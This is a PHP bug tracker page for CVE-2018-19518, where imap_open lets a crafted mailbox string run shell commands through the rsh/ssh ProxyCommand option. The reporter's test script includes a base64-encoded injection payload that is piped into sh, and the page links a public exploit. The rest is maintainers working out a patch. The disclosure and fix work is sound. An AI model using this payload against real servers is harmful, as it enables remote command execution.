php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #77153 imap_open allows to run arbitrary shell commands via mailbox parameter
Submitted: 2018-11-14 17:54 UTC Modified: 2019-01-31 23:26 UTC
From: azjezz at protonmail dot com Assigned: stas (profile)
Status: Closed Package: IMAP related
PHP Version: 5.6.38 OS: Debian-like ( debian / ubuntu )
Private report: No CVE-ID: 2018-19518
 [2018-11-14 17:54 UTC] azjezz at protonmail dot com
Description:
------------
Bypassing disabled exec functions in PHP via imap_open (Debian & Ubuntu)

this bug has already been made public : 

- https://antichat.com/threads/463395/#post-4254681
- https://github.com/Bo0oM/PHP_imap_open_exploit

Test script:
---------------
<?php

# echo '1234567890'>/tmp/test0001

// $server = $_POST['server'] ??? 
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";

imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2018-11-14 17:58 UTC] azjezz at protonmail dot com
-Operating System: Debin-like ( debin / ubuntu ) +Operating System: Debian-like ( debian / ubuntu )
 [2018-11-14 17:58 UTC] azjezz at protonmail dot com
fix typo in os name
 [2018-11-14 18:07 UTC] stas@php.net
Huh, imap library just runs external commands with no escaping whatsoever? This sucks :(

I guess we need to add some filters there. Not sure whether this ssh/rsh thing is even useful... But we probably could at least filter the hostname.
 [2018-11-14 18:08 UTC] stas@php.net
-Summary: bypass disabled exec function +Summary: imap_open allows to run arbitrary shell commands via mailbox parameter
 [2018-11-14 19:11 UTC] stas@php.net
And mailbox parsing happens inside c-client, so we have no control over it. Looks like we'd have to disassemble the mbox string, validate it and re-assemble it back. Maybe also add /norsh by default.
 [2018-11-15 15:44 UTC] cmb@php.net
> Maybe also add /norsh by default.

Iff that would resolve the RCE vulnerability, we may consider
to disable rsh support globally.  From imap.2007f/docs/FAQ.txt:

| You can disable rsh globally by setting the rsh timeout value
| to 0 with the call:
| mail_parameters (NIL,SET_RSHTIMEOUT,0);

Calling this in MINIT[1] *might* be sufficient.

Anyhow, since this issue is already lively discussed in public, I
think we have to hurry up with a solution.

[1] <https://gist.github.com/cmb69/b3ca981599bf21004c6417ab64dea4b7#file-disable-rsh-globally-patch>
 [2018-11-15 19:35 UTC] stas@php.net
Would this also disable SSH functionality? Because there's also ssh (which seems to be different branch from rsh, though on Debian it's the same thing in fact, but not on other systems) and it may be vulnerable too. 

It is also BC break so we'd probably have to announce it and put it into UPGRADING.
 [2018-11-15 20:00 UTC] stas@php.net
OK, there's also SET_SSHTIMEOUT, so probably we'd need to do both of them. We may allow a way to enable them back though, in case anybody needs it (doubtful, but who knows?)
 [2018-11-15 20:04 UTC] azjezz at protonmail dot com
-Summary: imap_open allows to run arbitrary shell commands via mailbox parameter +Summary: bypass disabled exec function
 [2018-11-15 20:04 UTC] azjezz at protonmail dot com
i think maybe adding a `php.ini` directive for it defaulting to 0 should do it.

example :

imap.set_rshtimeout=0
imap.set_sshtimeout=0
 [2018-11-15 20:07 UTC] azjezz at protonmail dot com
-Summary: bypass disabled exec function +Summary: imap_open allows to run arbitrary shell commands via mailbox parameter
 [2018-11-15 20:07 UTC] azjezz at protonmail dot com
revert summary change
 [2018-11-16 00:16 UTC] cmb@php.net
Indeed, (a) new ini option(s) might be appropriate for BC reasons.
I think we should reduce these to a minimum (maybe just a boolean
imap.allow_sh).

FTR: not only imap_open() seems to be affected by this issue, but
also imap_createmailbox() and imap_append() and maybe others.
 [2018-11-18 20:57 UTC] stas@php.net
-PHP Version: Irrelevant +PHP Version: 5.6.38
 [2018-11-19 01:13 UTC] stas@php.net
Proposed patch:

https://gist.github.com/smalyshev/aae34ba0a831e9a5c4824b1ee89579c2

I plan to merge it sometime early next week, if there are no objections, since the issue is already public. It is somewhat of a BC break but I don't think we have a choice here.
 [2018-11-19 01:13 UTC] stas@php.net
The patch is for 5.6, I'll upmerge it of course.
 [2018-11-19 01:13 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2018-11-19 21:08 UTC] stas@php.net
Opening it since it's essentially in public anyway.
 [2018-11-20 07:23 UTC] c dot r dot l dot f at yandex dot ru
Guys this is the same research from #76428 which you totally ignored.
 [2018-11-20 07:27 UTC] c dot r dot l dot f at yandex dot ru
stas@php.net knew about this from 2018-06-20.
 [2018-11-20 07:44 UTC] stas@php.net
Yes, I did not realize at the time c-client is essentially a dead project and is not going to be fixed. Now I realize that so it looks like we need to mitigate it in PHP (even though it's not directly a PHP issue).
 [2018-11-20 19:38 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2018-11-21 01:54 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2018-12-03 09:15 UTC] remi@php.net
-CVE-ID: needed +CVE-ID: 2018-19158
 [2018-12-11 16:42 UTC] anarcat at debian dot org
CVE-2018-19158 is a typo. mitre actually allocated CVE-2018-19518 instead, see also https://www.openwall.com/lists/oss-security/2018/12/05/2

could some php.net fix the metadata here? I'll request Mitre reserve the erroneous CVE since it's been used in some other places already and should probably be discarded to avoid the confusion.
 [2019-01-31 23:26 UTC] stas@php.net
-CVE-ID: 2018-19158 +CVE-ID: 2018-19518
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 11:01:29 2024 UTC